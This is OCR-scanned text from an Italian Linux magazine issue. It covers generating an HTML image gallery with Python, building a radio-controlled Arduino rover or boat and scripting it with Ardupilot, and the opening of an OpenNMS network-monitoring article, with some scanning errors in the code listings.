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sarà in HTML. Ora, il passo successivo è capire come creare il 
corpo del documento, ovvero le informazioni visualizzate dal 
browser, Per evidenti motivi di spazio saremo telegrafici e pun- 
teremo l'attenzione solo sulle parti che ci occorrono: 


- Immagini: si utilizza il tag <img>. Accetta svariati parame- 
tri e non va chiuso. Ad esempio: <img sre="“/percorso/imma- 
gine.png” width=200” height=“200” alt=“Mia immagine” 
border=“2”> dove, al di là dei parametri width (larghezza) 
e height (altezza), troviamo alt contenente una descrizione 
dell'immagine e border che crea un bordo di X pixel (2 nel 
nostro caso) attorno all'immagine; 


- Collegamenti: permettono la navigazione su un'altra pagina 
o altro sito. Il tag è <a> e va chiuso con </a>. Ad esempio: <a 
href=“/percorso/assoluto/pagina.html”>Esempio di collega- 
mento</a>. È possibile inserire anche delle ancore (riferimenti 
nella medesima pagina) con <a name=“rif1’’>Riferimento1</ 
a> collegabile con <a href="#rif1’°>Riferimento1</a>; 


- Tabelle: iniziano con il tag <table> che accetta diversi para- 
metri come ad esempio width (larghezza), cellspacing (distanza 
in pixel tra le celle), cellpadding (distanza del testo dal bordo 
della cella) e border (i bordi della tabella: un valore 0 indica 
una “tabella invisibile”). Le tabelle sono caratterizzate da righe 
con i tag table row, <tr> e </tr>, e dalle celle (table data) con 
i tag <td> e </td>. Vediamo un esempio concreto: 


<table width="600” align ="“‘center” cellspacing=%12”1 
cellpadding=%“18” border="9"%> 
<tr> 
<td align='center'> 
<b>Contenuto Cella N.1</b><br /> 
<i>Riga 1 - Colonna 1</i> 
</td> 
<td align='center'> 
<i>Contenuto Cella N.2</i><br /> 
<b>Riga 1 - Colonna 2</b> 
</td> 
Vers 
</table> 


Le indentazioni, a differenza del Python, non sono obbligatorie, 
ma è buona norma riportarle per migliorare la leggibilità. Le 
poche righe di sopra possiamo copiarle in un file che salveremo, 
ad esempio, con il nome Pagina.html per poi lanciarlo con un 
browser qualsiasi e vederne il risultato. È possibile aggiungere 
una seconda riga in basso riportando tutto il contenuto tra <tr> e 
</tr> per avere così una tabella con due righe e due colonne. Per 
avere una terza colonna è sufficiente aggiungere un'altra coppia 
di tag <td> e </td>. Infine i tag <b> e </b> indicano che il testo 
ivi compreso è in grassetto, mentre <i> e </i> è in corsivo. Il tag 
<br> è un ritorno a capo. Abbiamo capito sommariamente come 
creare una tabella. Il codice, però, dobbiamo crearlo con Python 
e in più la tabella dovrà essere “dinamica” poiché non sappiamo 
a priori di quante immagini dovremo farne una miniatura. 
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GENERARE LA PAGINA HTML 


A questo punto non ci resta che l'ultimo passo: creare un modulo 
che generi una pagina HTML. Premettiamo che esistono pac- 
chetti realizzati ad-hoc da installare per creare codice HTML, 
ma in questo caso lo creeremo noi da zero senza far uso di so- 
luzioni già confezionate. Questo modo di procedere ci permet- 
terà di aggiungere qualche altra caratteristica legata al Python. 
Apriamo con un qualsiasi editor di testi il file Genera HTML. 
py. Per la comprensione del codice è sufficiente leggere i com- 
menti riportati. Lanciando il programma secondo le modalità 
riportate nel paragrafo Coordiniamo i lavori verrà generato, 
nel percorso passato come argomento, il file Galleria.html che 
potremo lanciare con il browser. 

La Fig. 6 è visibile un primo risultato dei nostri sforzi: osservia- 
mo come le immagini risultino centrate sia in altezza che in lar- 
ghezza a seconda dell'effettivo ridimensionamento per il man- 
tenimento del rapporto d'aspetto, un risultato ottenuto con solo 
71 righe di codice (escludendo e righe bianche)! Naturalmente 
vi sono tanti margini di miglioramento sia in termini di caratte- 
ristiche aggiuntive così come in un compattamento del codice e 
nella modalità di visualizzazione della galleria che al momento 
risulta un po' “grezza”. Nel prossimo appuntamento vedremo 
come migliorare questa galleria di immagini. Per il momento 
terminiamo questo appuntamento lasciandoci con alcune osser- 
vazioni sul file Genera HTML.py: il cuore del programma sono 
le righe che vanno dalla 49 alla 58! Si entra in un ciclo for e si 
elencano tutti gli elementi della lista contenuti nella variabile 
elencoMiniature. Si scrivono di volta in volta i codici sul file 
Galleria.html che non viene chiuso se non al termine, all'uscita 
del for (riga 60). 

La variabile maxminriga presente nel metodo __init__ e utiliz- 
zata alla riga 56 serve a definire il massimo numero di celle (e 
quindi di colonne) per ogni riga. Gli spazi nelle diverse variabili 
servono solo ad assicurarsi un codice indentato (non obbligato- 
rio). Per la riga 54, rimandiamo invece al box “I segnaposto”. 
Come al solito, per qualsiasi problema possiamo far riferimento 
al forum di Linux Magazine (www.linux-magazine.it/forum/). 
Ancora una volta, ricordiamo che i sorgenti della galleria pos- 
sono essere scaricati dalla pagina Attp://goo.gl/KrFZ6E. 


I SEGNAPOSTO 


Inseriamo i riferimenti 


Nei precedenti appuntamenti abbiamo già incontrato 
questa sintassi, ma fino ad ora non l'abbiamo appro- 
fondita. Prendiamo come riferimento il simbolo “%" 
prima della parentesi tonda nella riga 54. L'argomen- 
to a sinistra è detto stringa di formato e può conte- 
nere dei segnaposto con il tipo di variabile (%s per la 
stringa, %f per un float etc). Se osserviamo l'operan- 
do destro notiamo che esso è una tupla contenente 
l'elenco delle variabili che compaiono nell'ordine 
presente nell'operando di sinistra. Con una sola riga 
creiamo la cella e ne fissiamo il contenuto! 
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droni, veicoli autonomi in grado di spostarsi su terra, in ac- 

qua o in aria, oltre a soddisfare tristi scopi militari, possono 

essere utili per svolgere compiti che risultano troppo peri- 
colosi o costosi per una persona. E per questo li vedremo popo- 
lare le nostre città, in un prossimo futuro. Utilizzare un drone 
già assemblato è semplice, chiunque è in grado di farlo. Ma noi, 
abbiamo deciso di osare ancor di più e di creare una completa 
guida che permetta a tutti i lettori di costruirne uno partendo da 
zero: oltre al piacere di una realizzazione in proprio, questa potrà 
essere la base per future personalizzazioni, fattore indispensabile 
per attività ad alta specializzazione come quella dei droni. Co- 
minceremo con la realizzazione di un semplice drone a quattro 
ruote (ma potremo anche adottare quattro pale, per veicoli acqua- 
tici) tramite Arduino: il veicolo potrà essere controllato tramite 
un radiocomando, perché realizzeremo uno sketch (il codice sor- 
gente accettato da Arduino) in grado di interpretare i segnali in- 
viati su onde radio. Utilizzeremo quattro motori, uno per ciascuna 
ruota, realizzando quindi un “fuoristrada” a trazione integrale. 
Come vedremo, questo stesso modello può essere utilizzato per 
realizzare barche capaci di navigare. Questo sarà il nostro “Hello 
World”, per meglio comprendere le basi della costruzione di mo- 
delli radiocomandati. Successivamente, passeremo ad Ardupilot, 
una scheda Arduino modificata appositamente per realizzare vei- 
coli a movimento autonomo. Fino a qualche anno fa, Ardupilot 
veniva venduto come shield da montare su una scheda Arduino 
MEGA, dotato di tutti i sensori necessari (per esempio gli acce- 
lerometri). Gli autori si sono però accorti che è economicamente 
più vantaggioso saldare direttamente tutto sulla stessa scheda, 
incluso il processore ed i normali circuiti di Arduino (che sono 
ovviamente pubblicati come Open hardware, quindi non si paga 
diritto d'autore). Una delle grandi comodità di Ardupilot sta nel 
fatto che si può programmare molto facilmente con un ambiente 
grafico oppure tramite codice Python. Ripeteremo quindi lo stes- 
so progetto (fondamentalmente un fuoristrada 4x4 in miniatura), 
ma in modo molto più completo e professionale. 


FATTI 
IL DRONE 
OPEN SOURCE! 


Arduino, un po' di programmazione ed il drone è servito: 
ecco come realizzare un modello completo di GPS e 
completamente Open Source 


W Fig. 1 e Un drone dotato di ruote viene definito rover. Se 
equipaggiato con delle pale, invece, diviene una barca 


COME FUNZIONA 
UN RADIOCOMANDO 


La nostra descrizione si basa sul radiocomando Turnigy 9x (ac- 
quistabile ad un prezzo abbastanza invitante sulla pagina Attp:// 
tinyuri.com/radiocomando), uno dei modelli standard più diffusi: 
praticamente tutti gli altri radiocomandi seguono le stesse re- 
gole. La possibilità di controllare il drone dipende dalla sezio- 
ne radio: ogni leva controlla l'accelerazione (yaw), il rollaggio 
(roll), ed il passo (pitch). Spostando la leva corrispondente, 
aumentiamo il valore numerico assegnato a ciascuna di queste 
proprietà. Ad esempio: quando l'accelerazione è al minimo, il 
suo valore è 0. Quando è al massimo, il valore arriva a 1800. È 
ovvio che se l'accelerazione è a 1300 i motori gireranno molto 
più velocemente di quando l'accelerazione è a 900. Le leve sono 
dei banali potenziometri, che regolano l'intensità di un segnale 
di corrente (per la legge di Ohm, I=V/R). Forniscono quindi 
in uscita un segnale analogico (o digitale). La scheda (Arduino 
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o Ardupilot) trasformerà con una funzione matematica l'input 
prodotto dal telecomando in un numero compreso tra 0 e 1800. 
Ci rimane da comprendere in quale modo il segnale passi dal ra- 
diocomando alla scheda, anche se è abbastanza facile da intuire. 
L'apparecchio radio trasmette i valori dei potenziometri in tem- 
po reale, utilizzando un canale di comunicazione diverso per 
ciascuno di essi. 

In questo modo, il ricevitore può avere sempre il valore corretto 
di ogni leva: se si utilizzasse un solo canale radio si potrebbe tra- 
smettere un singolo valore per volta. E sarebbe quindi impossi- 
bile regolare contemporaneamente il rollaggio e l'accelerazione. 
Il veicolo sarebbe quindi molto probabilmente ingovernabile. 

Il numero massimo di segnali trasmissibili è ovviamente dato 
dal numero di canali su cui lavora il radiocomando: il Turnigy 
9x dispone di ben 9 canali. 

Per un modello normale, 4 di essi sono più che sufficienti, ma 
gli altri possono tornare utili qualora si volesse collegare alla 
scheda Arduino/Ardupilot qualche altro dispositivo da control- 
lare (per esempio un servomotore per ruotare la videocamera 
fissare al drone). 

Inoltre, il radiocomando ha anche degli switch, cioè degli in- 
terruttori: questi si comportano come le altre leve (in effetti 
sono anch'essi delle leve anche se di dimensioni ridotte), con 
la differenza di non avere valori intermedi. In pratica, il segnale 
analogico prodotto da un interruttore è soltanto 0 oppure 1800, 
cioè si comporta un po' come un sistema digitale in cui le uniche 
opzioni sono spento 0 acceso. 

Vi è un particolare: 0 e 1800 sono i due limiti teorici dei valori 
del radiocomando. Ma, considerando che le trasmissioni radio 
sono spesso disturbate da interferenze e che la costruzione delle 
leve potrebbe non essere perfetta (per esempio potrebbero avere 
il movimento limitato di alcuni millimetri), i due valori sono 
spesso differenti. 

Per tale motivo è importante calibrare (una volta ogni tanto o in 
caso di danneggiamento fisico degli apparati) la lettura dei va- 
lori del radiocomando. In questo modo si può impostare il vero 
valore minimo ed il vero valore massimo. 


MOTORE 


BATTERIA 


W Fig. 2 * Ecco lo schema di collegamento di un ESC ad Arduino 
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COME SI ASSEMBLA UN DRONE 


Le regole di assemblaggio di un drone dipendono, ovviamente, 
dal tipo di drone: un quadricottero è 

diverso da un aereo, che a sua volta è diverso da un'automobile. 
Tuttavia, un'automobile ed una barca non sono troppo diverse: 
una semplice barca può infatti essere realizzata con la stessa 
struttura di una auto, sostituendo però le ruote con delle pale 
in grado di spostare l'acqua su cui la barca andrà a poggiare. 
Abbiamo scelto di trattare questo tipo di veicolo (anzi, di veico- 
li, considerando che parliamo sia di automobili che di natanti) 
perché è il più semplice da costruire. 

AI di là della forma dell'automobile, che è piuttosto banale (pro- 
babilmente tutti sappiamo che le ruote devono essere posiziona- 
te in coppia nella parte anteriore ed in quella posteriore), ciò che 
conta è la connessione: tra motori e schede di controllo. Innan- 
zitutto, ricordiamo che ogni ruota avrà il suo motore, in modo da 
poter avere la massima propulsione possibile. È fondamentale 
capire che non si può collegare un motore direttamente ad una 
uscita digitale di Arduino: i motori sono brushless, quindi è ne- 
cessario un circuito di controllo per dare la corretta polarità ai 
cavi. Inoltre, questi motori necessitano di una potenza piuttosto 
elevata (12V e diversi milliAmpere, a seconda del modello), e 
Arduino può fornire un massimo di SV. Per tali motivi, si utiliz- 
zano degli ESC: sono delle piccole schede, del costo di 20 euro 
l'una, che devono essere collegate tra Arduino ed i motori. Gli 
ESC hanno 5 input: i due cavi più grossi vanno collegati alla 
batteria. Tra l'altro, dovendo collegare più ESC (uno per ogni 
motore) alla batteria, è meglio usare una “scheda di alimenta- 
zione” cioè una piastra che dissipa il calore. Gli altri tre cavi, i 
più piccoli, sono solitamente rosso, nero, e bianco (o giallo). Il 
rosso non deve essere collegato ad alcunché, il nero va connesso 
al pin GND di Arduino, ed il bianco deve essere collegato ad un 
pin digitale di Arduino. Questo pin, verrà utilizzato per indicare 
al motore la velocità desiderata. I tre output, invece, vanno col- 
legati al motore. Solitamente, i colori sono standard, quindi il 
cavo giallo dell'ESC va collegato a quello giallo del motore, e lo 
stesso vale per quello rosso e nero. 

E il radiocomando? Il suo ricevitore dispone di una serie di pin: 
ogni tripletta è assegnata ad un canale. In realtà, per ciascuna 
tripletta, ciò che conta è esclusivamente il pin del segnale (di 
solito marcato da una S). Ogni pin del segnale deve essere col- 
legato ad un pin digitale di Arduino. 

Solo per una delle triplette (una qualsiasi) si deve collegare an- 
che il pin positivo (indicato dal simbolo + o dal colore rosso) 
con il pin SV di Arduino, ed il rimanente con il pin GND di 
Arduino. Ovviamente, non è necessario collegare tutti i pin di 
segnale: soltanto quelli dei canali che ci interessano. Di solito, 
sono rilevanti soltanto i primi quattro canali, perché indicano le 
direzioni avanti/indietro e destra/sinistra di ciascuna delle due 
leve del radiocomando. Ma possiamo anche collegarli tutti per 
non sbagliare. 


ECCO IL CODICE 


Se abbiamo collegato tutti i cavi nel modo corretto, è il mo- 
mento di scrivere il codice che farà funziona la scheda Arduino. 


Fondamentalmente, dovremo leggere i valori forniti dal radio- 
comando e muovere i motori in maniera coerente rispetto ai va- 
lori letti. Il numero ottenuto da Arduino, solitamente, varia da 
1400 a 2300: quando la leva è ferma al centro, il valore si trova 
tra 1700 e 1900-2000. 


#include <Servo.h> 


Il codice dello sketch comincia con l'inclusione della libreria 
Servo che consente la gestione di un motore brushless. 


Nell'area generale del programma, viene dichiarato un oggetto 
per ogni ESC che viene collegato ad Arduino. 


int pini = 2; // su radiocomando ch2 alto/basso 
int pin2 = 4; // su radiocomando ch4 destra/sinistra 


Si dichiarano anche due variabili intere che contengono il nu- 
mero del pin Arduino cui sono collegati i segnali provenienti dai 
due canali del radiocomando che ci interessano. In particolare, 
siamo interessati a quella che sul Turnigy 9x è la leva sinistra 
(che ha posizione di partenza centrale in entrambe le direzioni). 
Quindi, lo spostamento verso l'asse avanti/indietro viene indi- 
cato tramite il canale 2, mentre quello dell'asse destra/sinistra è 
sul canale 4. Se il radiocomando in nostro possesso è diverso dal 
Turnigy 9x, la soluzione più consiste nel provare tutti i canali 
finché non si trova quello che durante il movimento della leva 
cambia valore. Noi, per comodità, abbiamo deciso di collegare 
il pin 2 del ricevitore del radiocomando al pin 2 di Arduino, e 
ci siamo comportati similmente per il pin 4. Ovviamente, se 


preferiamo possiamo sceglierne altri. 


M Fig. 3|pindelradiocomando: il segnale è la fila in alto 


void setup() 
{ 
pinMode (pinl, INPUT); 


pinMode(pin2, INPUT); 


La funzione setup(), che viene eseguita una volta sola all'avvio 
di Arduino, si occupa di impostare i pin 2 e 4 per la lettura di un 
valore, dal momento che li useremo per leggere i segnali forniti 
dal ricevitore del radiocomando. 


escl.attach(3); 
esc2.attach(5); 
esc3.attach(6); 


esc4.attach(9); 


È poi necessario inizializzare gli oggetti esc, assegnando a cia- 
scuno di essi il numero del pin di Arduino a cui è stato collegato 
il cavo del segnale dell'ESC in questione. Per convenzione, il 
motore | sarà posto nella parte anteriore sinistra, il numero 2 
nella zona anteriore destra, il terzo nella posteriore sinistra, ed 
infine il 4 nella posteriore destra. 

I pin Arduino a cui i motori vengono collegati sono rispettiva- 
mente il 3, 5, 6, e 9. Abbiamo scelto proprio questi perché sono 
PWM (Pulse With Modulation), ovvero pin digitali in grado di 
fornire in output un valore analogico: in poche parole, un nume- 
ro (che indicherà la velocità del motore). 


Serial.begin(9600); 


\ 
Ì 


Prima di concludere la funzione, si deve anche avviare la sessio- 
ne della porta seriale, utile per verificare che lo sketch funzioni. 


void loop() 


m a 


int ch2 = 0; 


La funzione loop, che viene eseguita ripetutamente, viene fatta 
iniziare dichiarando due variabili che conterranno il valore for- 
nito dai due canali del radiocomando. 


chi 
ch2 


pulseIn(pinl, HIGH, 25000); 
pulseIn(pin2, HIGH, 25000); d i 


La lettura del radiocomando in questione è piuttosto semplice, 
e viene eseguita tramite la funzione pulseIn che decodifica gli 
impulsi prodotti dal ricevitore del radiocomando. 


Serial.print ("Channel 1:"); 
Serial.println(chi); 
Serial.print("Channel 2:"); 
Serial.println(ch2); 


Per aiutarci a capire cosa stia succedendo, scriviamo sulla se- 
riale i valori letti. In questo modo, usando il monitor seriale, si 
può capire come cambi il valore di un canale allo spostamento 
di una leva. 


int throttle = 90; 


} 


Ora, è importante capire come funzioni un motore brusless in 
Arduino: al motore (anzi, all'ESC) viene fornito un numero 
compreso tra 0 e 179. Nel caso di servomotori a rotazione conti- 
nua, cioè i classici brushless, 0 rappresenta la velocità massima 
di rotazione in una direzione, 179 la velocità massima nella di- 
rezione opposta, e 90 la posizione di stallo. 

Attenzione: consigliamo di utilizzare degli ESC prodotti appo- 
sitamente per barche (boat ESC): solo questi, infatti, vengono 
sempre realizzati con l'abilità di far ruotare il motore in entram- 
be le direzioni (negli altri ESC tale caratteristica non è sempre 
implementata). La velocità desiderata viene memorizzata nella 
variabile throttle. 


if (chi < 1700) { 
int inv = 1700 - chi; 
throttle = map(inv, 0, 400, 90, 0); //vai avanti 


} 


Nel caso in cui il valore letto dal radiocomando sia inferiore 
a 1700, significa che è stata spostata al leva in avanti. Quindi 
1700 indica accelerazione minima e 1300 accelerazione massi- 
ma. Poi invertire la tendenza, in modo da avere un andamento 
crescente, introduciamo la variabile inv. Questa, infatti, avrà va- 
lore 0 per indicare accelerazione minima, e 400 per indicare la 
massima. Poi, “mappiamo” il numero ottenuto sulla scala dei 
valori disponibili per il radiocomando. Nella funzione map, vie- 
ne fornito come argomento il numero rilevato dal radiocomando 
(in questo caso, si tratta del valore invertito). Poi, si specificano 
i punti di minimo e massimo della sua scala, ovvero 0 e 400. 
Infine, si indica il range di valori che si desiderano in output, 
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ovvero 90 nel caso la posizione della leva indichi accelerazione 
minima, e 0 nel caso di accelerazione massima. 


if (chi > 2000) { 
throttle = map(chi, 2000, 2400, 90, 179); //vai 
indietro 


} 


Allo stesso modo, nel caso la leva sia spostata all'indietro (valo- 
re maggiore di 2000) la variabile throttle deve essere mappata 
sulla base del valore letto (che, per l'appunto, può variare tra 
2000 e 2400) in modo da spaziare tra 90 e 179 rispettivamente 
per velocità minima e massima. 

Se il valore che indica la posizione della leva è compreso tra 
1700 e 2000, significa che la leva è ferma al centro, quindi l'au- 
tomobile non deve muoversi, e throttle rimane al valore iniziale 
di 90. 


if (ch2 > 2100) { 

escl.write(90); 

esc3.write(90); 

Ora dobbiamo scrivere i valori di velocità calcolati negli oggetti 
Servo creati appositamente per ogni ESC. Tuttavia, dobbiamo 
capire se la leva destra/sinistra sia stata spostata. Per esempio, 
se la leva è stata portata a sinistra (valore del secondo canale 
superiore a 2100), i motori sinistri (escl ed esc3) dovranno es- 
sere fermati. Quindi la loro velocità dovrà essere impostata a 90. 


} else { 
escl.write(throttle); 


} 


Se, invece, la leva si trova al centro o a destra, i motori sinistri 
potranno girare con la velocità calcolata poco fa e memorizzata 
nella variabile throttle. 


QUADRICOTTERO 


SN EI, 


M Fig. 4 è Lo schema di posizionamento standard dei motori 
in un quadricottero e in un rover 


if (ch2 < 1800) { 
esc2.write(90); 
esc4.write(90); 

} else { 
esc2.writel(throttle); 
esc4.write(throttle); 


Altitude (m) 


‘0.00 


Fig. 5 * L'interfaccia grafica di Mission Planner 


0.00 


Allo stesso modo, i motori destri dovranno essere bloccati se la 
leva del radiocomando viene spostata a destra (valore del canale 
inferiore a 1800). In caso contrario, si scrive la velocità desi- 


derata. 


La funzione è ormai conclusa: inseriamo soltanto un'ultima 
istruzione per far attendere un decimo di secondo (100 millise- 
condi) ad Arduino prima di eseguire nuovamente questa stessa 
funzione. In tal modo, il valore ricevuto dal radiocomando su 
entrambe i canali viene “campionato” ogni 100 millisecondi. 
Ora, riassumendo, le condizioni possibili sono le seguenti, con i 


valori medi del radiocomando inseriti tra parentesi 


eleva avanti (1300-1700): i motori girano in senso orario 

eleva indietro (2000-2400): i motori girano in senso antiorario 
eleva a destra (maggiore di 2100): i motori di destra sono bloccati 
eleva a sinistra (minore di 1800): i motori di sinistra sono bloccati 


Tutto qui? Proprio così! In poche decine di righe di codice, ab- 
biamo realizzato un semplice drone rover/barca gestibile tramite 
radiocomando. Ovviamente, il progetto può essere ampliato. Per 
esempio, si possono aggiungere due servomotori di precisione, 


in modo da riuscire a muovere lungo gli assi orizzontale e ver- 
ticale una videocamera montata sul drone, controllando questo 


motori con l'altra leva del radiocomando. 


IL MOMENTO DI ARDUPILOT 


Ora che abbiamo concluso il nostro “Hello World”, possiamo ri- 
volgerci al progetto più completo: la scheda Ardupilot. Questa è 
fornita con i sensori necessari al movimento autonomo del drone 
(gli accelerometri ed i giroscopi) saldati su di essa, Inoltre, i vari 
pin di una normale scheda Arduino MEGA sono stati disposti in 
modo da facilitare il collegamento del radiocomando, dei motori, 
e di altri sensori acquistabili a parte come il GPS, La semplicità 
d'uso e la grande flessibilità sono i punti di forza di Ardupilot: 
con questa scheda si può realizzare qualsiasi tipo di drone, dalla 
più piccola automobile, al più grande multicottero. La program- 
mazione della scheda è resa semplice dal programma Mission- 
Planner, liberamente scaricabile dal sito http:/planner.ardupilot. 
com/ e disponibile per Windows e Mac OS X (su GNU/Linux 
è necessario avviarlo tramite Wine). Grazie a MissionPlanner è 
possibile, per esempio, scegliere alcuni punti GPS (waypoint) 
formando un percorso, e ordinare al drone di spostarsi automati- 
camente seguendo la linea disegnata, Inoltre, grazie alla teleme- 
tria, si può mantenere il contatto con il drone stesso ance mentre 
si sta spostando, riprogrammandolo. La telemetria è semplice- 
mente data da due piccoli apparati radio: uno viene collegato alla 
scheda Ardupilot, l'altro al computer tramite porta USB standard. 
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ARLUPULOT 


Fig. 6 * La scheda Ardupilot facilita il collegamento di sensori ed ESC 


Fondamentalmente, sostituisce il cavo USB usato per program- 
mare la scheda, quindi si possono avere molte informazioni (per 
esempio, si può conoscere la posizione in tempo reale del drone, 
verificare la carica della batteria, eccetera), ed è anche possibile 
inviare dei comandi. Per esempio, si può ordinare al drone di fer- 
marsi immediatamente, cambiare il piano di viaggio (modifican- 
do il percorso disegnato o semplicemente stabilendo una nuova 
direzione), o ancora armare e disarmare la scheda (se la scheda è 
disarmata, i motori non potranno girare, è molto utile per garan- 
tire l'avvicinamento in totale sicurezza di una persona al drone). 
Tutte queste operazioni possono essere eseguite tramite il Mission 
Planner utilizzando una comoda interfaccia grafica estremamen- 
te intuitiva, quindi non ci interessa più di tanto. Ciò che risulta 
davvero molto interessante, per noi smanettoni, è la possibilità di 
realizzare una sorta di piano di viaggio sotto forma di program- 
ma Python. Il programma viene poi inviato alla scheda tramite lo 
stesso Mission Planner, che ovviamente lo traduce in assembly 
Atmel (quello del processore della scheda). Il “piano di viaggio” 
scritto in Python è ovviamente molto flessibile, ed è teoricamente 
possibile fare qualsiasi cosa, Nel caso si costruiscano droni volan- 
ti (aerei, multicotteri) è possibile programmare delle evoluzioni, 
per esempio si può scrivere un programma per far eseguire all'ae- 
reo un ottovolante od un volo sinusoidale in completa sicurezza. 
Nel caso di una barca o di un fuoristrada, si può comunque pro- 


grammare un percorso, per esempio organizzando dei testacoda. 


PROGRAMMABILE 


I programmi vengono scritti nella sintassi Python, e sono agevo- 
lati dalla presenza di alcuni oggetti che consentono l'accesso in 
lettura od in scrittura a componenti della scheda Ardupilot. Fon- 
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damentalmente, per leggere informazioni si usa l'oggetto CS 
che sta per Current State, Questo fornisce le informazioni sullo 
stato attuale del drone. Per esempio, cs.lat e es.lon contengono 
rispettivamente la latitudine e la longitudine attuali del veico- 
lo. Per agire, invece, si utilizza l'oggetto Script. Le funzioni di 


questo oggetto sono 


Script.Sleep(ms): ferma l'esecuzione del programma per i mil- 
lisecondi ms 
Script.ChangeParam(name,value): modifica un parametro 
Script.GetParam(name): legge il valore di un parametro 
Script.ChangeMode(mode): cambia la modalità di guida, soli- 
tamente preimpostata su AUTO 
Script.WaitFor(string,timeout): rimane in attesa del messag- 
gio string, per un tempo massimo pari a timeout 
Script.SendRC(channel,pwm,sendnow): simula la ricezione, 
sulla scheda, di un segnale dal radiocomando. 

I parametri sono delle variabili di base che stabiliscono le im- 
postazioni fondamentali della scheda e del drone in sé: per 
esempio, il parametro RC3_MIN indica il valore minimo che 
il segnale del canale 3 del radiocomando può raggiungere. Que- 
sto è molto importante, perché conoscendo i valori minimo e 
massimo, per esempio, del canale che rappresenta l'accelerazio- 
le, possiamo ordinare l'accelerazione o decelerazione sempli- 
cemente simulando con SendRC una serie di valori crescente 0 
decresce sul canale in questione. Come abbiamo capito, tutto di- 
pende dal valore numerico dell'accelerazione e di ciascuna delle 
altre proprietà, ed il radiocomando è solo uno strumento per 
modificare questi valori (spostando le leve). Ma possiamo modi- 


ficare tali valori anche con un programma Python, utilizzando al 


funzione SendRC. Come ultima nozione teorica, prima passare 
al codice vero e proprio, spieghiamo cosa siano i “messaggi”, 
ovvero quelle stringhe leggibili tramite la funzione WaitFor. 
Si tratta di gruppi di informazioni forniti dalla scheda stessa per 
indicare un cambiamento di stato. 

Ad esempio, è buona norma inserire all'inizio di un program- 
ma l'istruzione Script. WaitFor('ARMING MOTORS',30000). 
Questa, infatti, attende che i motori vengano armati, prima di 
procedere. 

Non avrebbe intatti senso inviare comandi alla scheda, magari 
ordinandole di accelerare i motori, se questi risultano impossi- 
bilitati a muoversi perché disarmati. Al di là di questo esempio, 
comunque, non è una funzione particolarmente utile. 


UN VIAGGIO SEMPLICE SEMPLICE 


Proviamo a realizzare un piano di viaggio molto semplice con 
Python: d 


print 'Start Script' 
for chan in range(1,4): 
Script.SendRC(chan,1500,False) 
Script.SendRC(3,Script.GetParam('RC3_ 1 
MIN'),True) 
Script.Sleep(5000) 


Per prima cosa, oltre a chiedere la stampa sulla seriale del mes- 
saggio “Start script” per indicare l'inizio dello script, scorria- 
mo i numeri da 1 a 4 con un ciclo for, usando come iteratore la 
variabile chan. Quello che stiamo facendo è, banalmente, scor- 
rere tutti i canali radio del nostro radiocomando. Per ciascuno 
di essi, impostiamo un valore di poco superiore al minimo (che, 
di norma, abbiamo visto essere intorno al numero 1300), ad ec- 
cezione del canale 3 (che rappresenta la leva di accelerazione) 
che viene impostato al suo valore minimo. Prima di procedere 
al canale successivo si attendono 5 secondi, in modo da essere 
certi che la moditica sia stata effettivamente compiuta. 


while cs.lat == 0: 
print ‘Waiting for GPS! 
Script.Sleep(2000) 


Il GPS ha bisogno di una certa quantità di tempo per essere ope- 
rativo (deve trovare i satelliti). Possiamo capire che il sensore 
non sia ancora pronto perché in tal caso la latitudine e la longi- 
tudine sono impostate a 0. Quindi realizziamo un semplice ciclo 
while che, mentre la variabile cs.lat (la latitudine) è zero, resta 
in attesa per due secondi. In questo modo, il programma resterà 
fermo finché non sarà possibile leggere un valore di latitudine e 
quindi si uscirà dal ciclo while. 


print 'Got GPS! 
print cs.lat 


Ora scriviamo un messaggio per dimostrare di avere ottenuto 
davvero una lettura GPS: possiamo infatti stampare sulla seriale 


il valore della latitudine. 


cs.messages.Clear() 
Script.WaitFor('ARMING MOTORS! ,60000) 


Facciamo pulizia di tutti i messaggi inviati finora dalla scheda, 
e restiamo in attesa della comparsa di quello che segnala l'ar- 
mo dei motori. Attenderemo questo messaggio per 60 secondi, 
quindi è questo il tempo che l'utente avrà a disposizione per 
armare la scheda. 


print ‘Motors Armed!' 
Script .SendRC(3,1700,True) 


Se i motori risultano armati, cominciamo a far muovere il veico- 
lo, portando l'acceleratore a 1700. 

Ci si potrebbe chiedere per quale motivo qui stiamo utilizzando 
un valore di 1700, visto che nell'esempio realizzato con Arduino 
tale valore serviva a fermare i motori. La differenza sta nel fatto 
che con Arducopter, di solito, si utilizza come acceleratore la 
leva destra del radiocomando, che quindi parte da 1300 come 
valore minimo ed arriva a 2400 come valore massimo. Di conse- 
guenza, 1700 è una buona accelerazione. 


Script .Sleep(10000) 

Script.SendRC(1,2000,True) 

Script.Sleep(500) 

Script .SendRC(1,Script.GetParam('RC1 MIN'),True) 


Aspettiamo 10 secondi e poi simuliamo lo spostamento della 
leva a destra, per far girare bruscamente il veicolo. Dopo mezzo 
secondo, riportiamo il canale radio 1 al suo valore minimo. In 
questo modo, il veicolo girerà a destra per 500 millisecondi, poi 
continuerà ad accelerare nella direzione che ha ormai intrapreso. 


oldalt. = cs.alt 
while cs.alt >= oldalt: 
Script.Sleep(50) 
Script.SendRC(3,1900,True) 
oldalt = cs.alt 
Script.Sleep(1000) 
Script.SendRC(3,Script.GetParam('RC3 MIN'),True) 


Per concludere, leggiamo l'altitudine attuale e la registriamo nella 
variabile oldalt. Poi, con un ciclo while, portiamo l'accelerazione 
a 1900 per un secondo, registrando però l'altitudine attuale nella 
solita variabile. Questo ciclo ci permette di fare una cosa piut- 
tosto interessante: il ciclo, infatti, resterà in esecuzione finché 
l'altitudine del veicolo aumenterà o al massimo rimarrà la stessa. 
Ciò significa che nel momento in cui il veicolo dovesse comin- 
ciare a scendere (per esempio perché ha raggiunto la sommità di 
una collinetta ed ora si dirige lungo il versante opposto, in disce- 
sa), verrebbe eseguita l'ultima istruzione, che è quella di portare 
l'accelerazione al minimo. Il veicolo, quindi, prosegue a correre 
solo finché può salire: quando il terreno comincia a scendere, il 
veicolo si ferma. Ora, non ci resta che scatenare la fantasia! 


® 


ess 
I 
Gennaio 2015 Se 79 


@ 


0900 


LA 


ni) 


el precedente numero abbiamo iniziato la nostra avventura con 

OpenNMS, il software che ci consente di scoprire con largo an- 

ticipo se qualche componente della nostra rete locale sta per 
passare a miglior vita. Proseguiamo dunque la nostra opera, passando 
all'attività di monitoraggio. 
Tale attività viene svolta in due modalità differenti: polling e collection. 
Nel primo caso, un processo, denominato monitor, si connette alla risorsa 
ed esegue il test per verificare che risponda correttamente. Nel secondo 
caso, invece, si utilizza un collector che raccoglie dati attraverso diffe- 
